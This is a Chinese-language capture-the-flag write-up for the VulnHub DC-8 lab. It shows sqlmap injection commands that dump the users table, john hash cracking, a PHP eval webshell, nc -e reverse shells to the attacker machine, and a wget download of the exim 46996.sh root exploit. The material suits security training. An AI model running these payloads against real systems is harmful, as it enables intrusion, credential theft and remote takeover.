vulnhub靶场之DC-8靶场实战（超详细）

攻击机kali：192.168.111.146

靶机DC-8：192.168.111.143

信息收集

IP

端口

代码语言：javascript复制

nmap -A -p- -T4 192.168.111.143

目录

代码语言：javascript复制

dirsearch -u http://192.168.111.143 -i 200

得到登录页面，想办法得到用户名和密码，尝试了暴力破解，弱口令等等方式

CMS

漏洞探测

访问网站首页，http://192.168.111.143/?nid=1，通过nid进行传参

在传参nid=1加上‘，页面显示报错信息，存在SQL注入漏洞

也可以使用sqlmap探测漏洞

代码语言：javascript复制

sqlmap -u "http://192.168.111.143/?nid=1" --batch

爆破数据库

代码语言：javascript复制

sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 --dbs
--risk=3 :风险等级，对目标系统安全性要求较低，对速度要求较高，谨慎使用，可能会对系统造成影响（0-3.等级越低，影响越小）
--level=5：测试等级，5级包含的payload最多（1-5.测试等级越高，测试将越全面,)

爆破数据表

代码语言：javascript复制

sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db --tables

爆破字段

代码语言：javascript复制

sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db -T users --columns

爆破字段内容

代码语言：javascript复制

sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db -T users -C name,pass --dump

密码爆破

密码是加密的，其hash值存储为txt文件后，使用哈希工具john 进行hash爆破

代码语言：javascript复制

touch passwd.txt 新建一个文件
vim passwd.txt 编辑文件内容，将hash之进行存储
john passwd.txt 使用John工具解密

登录网站，john/turtle

目的拿到webshell，上传木马，蚁剑连接，进行反弹shell

验证php代码是否能够被解析

代码语言：javascript复制

<p>LULU</>
<?php phpinfo();?> 

注入一句话木马，反弹shell

代码语言：javascript复制

<?php @eval($_REQUEST[6]);?>

蚁剑链接,虚拟终端，反弹shell

代码语言：javascript复制

nc -e /bin/bash 192.18.111.128 6666

kali监听

代码语言：javascript复制

nc-lvnp 6666

第二种方式：直接在表单设置内容中，写入反弹shell，kali 进行监听

代码语言：javascript复制

<p>LULU</p>
<?php
system("nc -e /bin/bash 192.168.111.128 1234")
?> 

交互式shell

代码语言：javascript复制

python -c "import pty;pty.spawn('/bin/bash')"

提权

suid提权

代码语言：javascript复制

SUID是一种对二进制程序进行设置的特殊权限，可以让二进制程序的执行者临时拥有属主的权限，若是对一些特殊命令设置了SUID，那么将会有被提权的风险
常用的SUID提权命令有：nmap、vim、find、bash、more、less、nano、cp等。

sudo和SUID的区别
    sudo是给某个用户或者组授予执行某些命令的权限，权限在人身上
    SUID是给命令赋予root用户的权限，权限在命令上

代码语言：javascript复制

find / -perm -u=s -type f 2>/dev/null

查看exim的版本

代码语言：javascript复制

exim4 --version

使用searchsploit 对exim 4.89在漏洞库中查找可利用的漏洞

代码语言：javascript复制

searchsploit exim 4.89

没有本地提权的漏洞，直接查找exim可利用的漏洞

代码语言：javascript复制

searchsploit exim 

查看漏洞

下载脚本

切换在/var/www/html,打开apache服务

代码语言：javascript复制

systemctl start apache2

在shell中下载

代码语言：javascript复制

wget http://192.168.111.128/46996.sh

需要切换到/tmp目录，进行下载

当前用户，和用户组权限不高，需要进行提权

代码语言：javascript复制

chmod 777 46996.sh

查看脚本文件,使用方法

代码语言：javascript复制

cat 46996.sh

两种使用方式进行提权

代码语言：javascript复制

./46996.sh -m setuid 提权不成功
./46996.sh -m netcat 

得到flag

测试 程序 漏洞 权限 网站

0 人点赞